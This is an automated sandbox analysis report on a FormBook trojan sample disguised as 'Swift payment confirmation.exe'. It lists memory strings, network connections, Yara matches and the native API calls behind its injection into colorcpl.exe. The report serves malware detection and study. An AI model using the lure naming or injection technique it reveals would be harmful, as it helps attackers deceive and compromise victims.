            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
            Source: Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
            Source: Swift payment confirmation.exe, 00000000.00000003.2127729872.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2090782300.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
            Source: Swift payment confirmation.exe, 00000000.00000003.2127729872.00000000008F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.217.102.228:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.217.102.228:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.5.29.82:443 -> 192.168.2.5:49712 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Swift payment confirmation.exe
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,0_2_032CB118
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C7A2C NtAllocateVirtualMemory,0_2_032C7A2C
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C7D78 NtWriteVirtualMemory,0_2_032C7D78
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_032CDD70
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_032CDBB0
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C7A2A NtAllocateVirtualMemory,0_2_032C7A2A
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C8D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_032C8D6E
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C8D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_032C8D70
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_032CDC04
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_032CDC8C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_0646C3C3 NtClose,2_2_0646C3C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_0644A775 NtCreateFile,2_2_0644A775
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_267D2C70
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_267D2DF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2B60 NtClose,LdrInitializeThunk,2_2_267D2B60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D35C0 NtCreateMutant,LdrInitializeThunk,2_2_267D35C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D4650 NtSuspendThread,2_2_267D4650
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D4340 NtSetContextThread,2_2_267D4340
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2E30 NtWriteVirtualMemory,2_2_267D2E30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2EE0 NtQueueApcThread,2_2_267D2EE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2EA0 NtAdjustPrivilegesToken,2_2_267D2EA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2E80 NtReadVirtualMemory,2_2_267D2E80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2F60 NtCreateProcessEx,2_2_267D2F60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2F30 NtCreateSection,2_2_267D2F30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2FE0 NtCreateFile,2_2_267D2FE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2FB0 NtResumeThread,2_2_267D2FB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2FA0 NtQuerySection,2_2_267D2FA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2F90 NtProtectVirtualMemory,2_2_267D2F90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2C60 NtCreateKey,2_2_267D2C60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2C00 NtQueryInformationProcess,2_2_267D2C00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2CF0 NtOpenProcess,2_2_267D2CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2CC0 NtQueryVirtualMemory,2_2_267D2CC0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2CA0 NtQueryInformationToken,2_2_267D2CA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2D30 NtUnmapViewOfSection,2_2_267D2D30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2D10 NtMapViewOfSection,2_2_267D2D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2D00 NtSetInformationFile,2_2_267D2D00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2DD0 NtDelayExecution,2_2_267D2DD0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2DB0 NtEnumerateKey,2_2_267D2DB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2AF0 NtWriteFile,2_2_267D2AF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2AD0 NtReadFile,2_2_267D2AD0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2AB0 NtWaitForSingleObject,2_2_267D2AB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2BF0 NtAllocateVirtualMemory,2_2_267D2BF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2BE0 NtQueryValueKey,2_2_267D2BE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2BA0 NtEnumerateValueKey,2_2_267D2BA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2B80 NtQueryInformationFile,2_2_267D2B80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D3010 NtOpenDirectoryObject,2_2_267D3010
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D3090 NtSetValueKey,2_2_267D3090
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D3D70 NtOpenThread,2_2_267D3D70
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D3D10 NtOpenProcessToken,2_2_267D3D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D39B0 NtGetContextThread,2_2_267D39B0
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032D8128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_032D8128
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B20C40_2_032B20C4
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BCA4E0_2_032BCA4E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_0644FE032_2_0644FE03
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_0644DE832_2_0644DE83
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_064424D02_2_064424D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_06442D002_2_06442D00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_0645652F2_2_0645652F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_064565332_2_06456533
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_0644FBDB2_2_0644FBDB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_0644FBE32_2_0644FBE3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_0646E9C32_2_0646E9C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_064411CD2_2_064411CD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_064411D02_2_064411D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_064421A02_2_064421A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BC6E02_2_267BC6E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A07702_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C47502_2_267C4750
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679C7C02_2_2679C7C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684E4F62_2_2684E4F6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268444202_2_26844420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268524462_2_26852446
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268605912_2_26860591
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A05352_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268202C02_2_268202C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268402742_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268603E62_2_268603E6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE3F02_2_267AE3F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685A3522_2_2685A352
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268320002_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268541A22_2_268541A2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268601AA2_2_268601AA
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268581CC2_2_268581CC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267901002_2_26790100
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683A1182_2_2683A118
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268281582_2_26828158
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685CE932_2_2685CE93
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0E592_2_267A0E59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685EEDB2_2_2685EEDB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685EE262_2_2685EE26
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B2E902_2_267B2E90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681EFA02_2_2681EFA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C0F302_2_267C0F30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267E2F282_2_267E2F28
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267ACFE02_2_267ACFE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792FC82_2_26792FC8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26842F302_2_26842F30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814F402_2_26814F40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB52_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0C002_2_267A0C00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26790CF22_2_26790CF2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AAD002_2_267AAD00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679ADE02_2_2679ADE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683CD1F2_2_2683CD1F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B8DBF2_2_267B8DBF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679EA802_2_2679EA80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26856BD72_2_26856BD7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685AB402_2_2685AB40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A28402_2_267A2840
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AA8402_2_267AA840
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE8F02_2_267CE8F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267868B82_2_267868B8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B69622_2_267B6962
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2686A9A62_2_2686A9A6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A29A02_2_267A29A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268516CC2_2_268516CC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267E56302_2_267E5630
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685F7B02_2_2685F7B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267914602_2_26791460
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685F43F2_2_2685F43F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683D5B02_2_2683D5B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268695C32_2_268695C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268575712_2_26857571
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268412ED2_2_268412ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BB2C02_2_267BB2C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A52A02_2_267A52A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678D34C2_2_2678D34C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685132D2_2_2685132D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267E739A2_2_267E739A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684F0CC2_2_2684F0CC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685F0E02_2_2685F0E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268570E92_2_268570E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A70C02_2_267A70C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678F1722_2_2678F172
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D516C2_2_267D516C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AB1B02_2_267AB1B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2686B16B2_2_2686B16B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A9EB02_2_267A9EB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685FFB12_2_2685FFB1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685FF092_2_2685FF09
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26763FD52_2_26763FD5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26763FD22_2_26763FD2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A1F922_2_267A1F92
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685FCF22_2_2685FCF2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26819C322_2_26819C32
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A3D402_2_267A3D40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BFDC02_2_267BFDC0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26851D5A2_2_26851D5A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26857D732_2_26857D73
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26841AA32_2_26841AA3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683DAAC2_2_2683DAAC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684DAC62_2_2684DAC6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26857A462_2_26857A46
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685FA492_2_2685FA49
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267E5AA02_2_267E5AA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26813A6C2_2_26813A6C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26815BF02_2_26815BF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267DDBF92_2_267DDBF9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685FB762_2_2685FB76
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BFB802_2_267BFB80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680D8002_2_2680D800
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A38E02_2_267A38E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A99502_2_267A9950
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BB9502_2_267BB950
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268359102_2_26835910
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: String function: 032B44DC appears 74 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: String function: 032B4860 appears 949 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: String function: 032B4500 appears 33 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: String function: 032B46D4 appears 244 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: String function: 032C894C appears 56 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: String function: 032C89D0 appears 45 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 267D5130 appears 58 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2680EA12 appears 82 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2678B970 appears 280 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2681F290 appears 103 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 267E7E54 appears 111 times
            Source: Swift payment confirmation.exeBinary or memory string: OriginalFilename vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000002FFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE4F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000003003000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FBDF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FBDF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2217929734.000000007FE2F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@3/3
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B7FD2 GetDiskFreeSpaceA,0_2_032B7FD2
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CAD98 CreateToolhelp32Snapshot,0_2_032CAD98
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C6DC8 CoCreateInstance,0_2_032C6DC8
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Swift payment confirmation.exeReversingLabs: Detection: 65%
            Source: Swift payment confirmation.exeVirustotal: Detection: 61%
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeFile read: C:\Users\user\Desktop\Swift payment confirmation.exeJump to behavior
